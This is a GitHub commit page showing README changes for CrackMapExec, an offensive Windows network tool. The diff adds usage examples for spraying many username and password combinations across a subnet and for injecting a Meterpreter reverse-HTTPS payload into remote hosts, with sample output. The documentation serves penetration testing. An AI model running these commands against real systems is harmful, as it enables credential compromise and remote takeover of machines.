Skip to content
This repository was archived by the owner on Dec 6, 2023. It is now read-only.

Commit 46c82fd

Browse files
author
byt3bl33d3r
committed
Updated usage and examples in the README
1 parent e25ccc6 commit 46c82fd

File tree

1 file changed

+30
-1
lines changed

1 file changed

+30
-1
lines changed

README.md

Lines changed: 30 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -101,6 +101,7 @@ Command Execution:
101101
102102
--execm {atexec,wmi,smbexec}
103103
Method to execute the command (default: smbexec)
104+
--force-ps32 Force all PowerShell code/commands to run in a 32bit process
104105
-x COMMAND Execute the specified command
105106
-X PS_COMMAND Excute the specified powershell command
106107
@@ -109,7 +110,7 @@ Shellcode/EXE/DLL/Meterpreter Injection:
109110
110111
--inject {met_reverse_http,met_reverse_https,exe,shellcode,dll}
111112
Inject Shellcode, EXE, DLL or Meterpreter
112-
--path PATH Path to the Shellcode/EXE/DLL you want to inject on the target systems
113+
--path PATH Path to the Shellcode/EXE/DLL you want to inject on the target systems (ignored if injecting Meterpreter)
113114
--procid PROCID Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)
114115
--exeargs EXEARGS Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)
115116
--met-options LHOST LPORT
@@ -148,6 +149,19 @@ Quick credential validation:
148149
[+] 172.16.206.130:445 Login successful 'DESKTOP-QDVNP6B\username:password'
149150
```
150151

152+
Specify multiple user/pass combinations from the command line or a file:
153+
```
154+
#~ python crackmapexec.py -t 100 172.16.206.0/24 -u username1,username2 -p password1,password2
155+
[*] 192.168.2.5:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
156+
[*] 192.168.2.6:445 is running Windows 6.3 Build 9600 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
157+
[-] 192.168.2.5:445 'DRUGCOMPANY-PC\username1:password1' SMB SessionError: STATUS_LOGON_FAILURE ...
158+
[-] 192.168.2.5:445 'DRUGCOMPANY-PC\username2:password1' SMB SessionError: STATUS_LOGON_FAILURE ...
159+
[+] 192.168.2.5:445 Login successful 'HRBOX\username1:password2'
160+
[-] 192.168.2.6:445 'DESKTOP-QDVNP6B\username2:password1' SMB SessionError: STATUS_LOGON_FAILURE ...
161+
[-] 192.168.2.6:445 'DESKTOP-QDVNP6B\username1:password1' SMB SessionError: STATUS_LOGON_FAILURE ...
162+
[+] 192.168.2.6:445 Login successful 'DESKTOP-QDVNP6B\username1:password2'
163+
```
164+
151165
Let's enumerate available shares:
152166
```
153167
#~ python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password --shares
@@ -268,6 +282,21 @@ Lets Spider the C$ share starting from the ```Users``` folder for the pattern ``
268282
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Done spidering (Completed in 38.6000130177)
269283
```
270284

285+
Directly inject Meterpreter into memory forcing the Powershell code to run in a 32bit process
286+
```
287+
#~ python crackmapexec.py -t 100 192.168.2.5-6 -u username -p password --force-ps32 --inject met_reverse_https --met-options 192.168.2.1 4545
288+
289+
[*] Press CTRL-C at any time to exit
290+
[*] Note: This might take some time on large networks! Go grab a redbull!
291+
292+
[*] 192.168.2.5:445 is running Windows 6.1 Build 7601 (name:HRBOX) (domain:HRBOX)
293+
[*] 192.168.2.6:445 is running Windows 6.3 Build 9600 (name:AVERAGEJOEBOX) (domain:AVERAGEJOEBOX)
294+
[+] 192.168.2.5:445 Login successful 'HRBOX\username:password'
295+
[+] 192.168.2.6:445 Login successful 'AVERAGEJOEBOX\username:password'
296+
192.168.2.6 - - [08/Oct/2015 12:50:56] "GET /Invoke-Shellcode.ps1 HTTP/1.1" 200 -
297+
192.168.2.5 - - [08/Oct/2015 12:50:58] "GET /Invoke-Shellcode.ps1 HTTP/1.1" 200 -
298+
```
299+
271300
#To do
272301
- Kerberos support
273302
- ~~Execute custom commands with mimikatz~~

0 commit comments

Comments
 (0)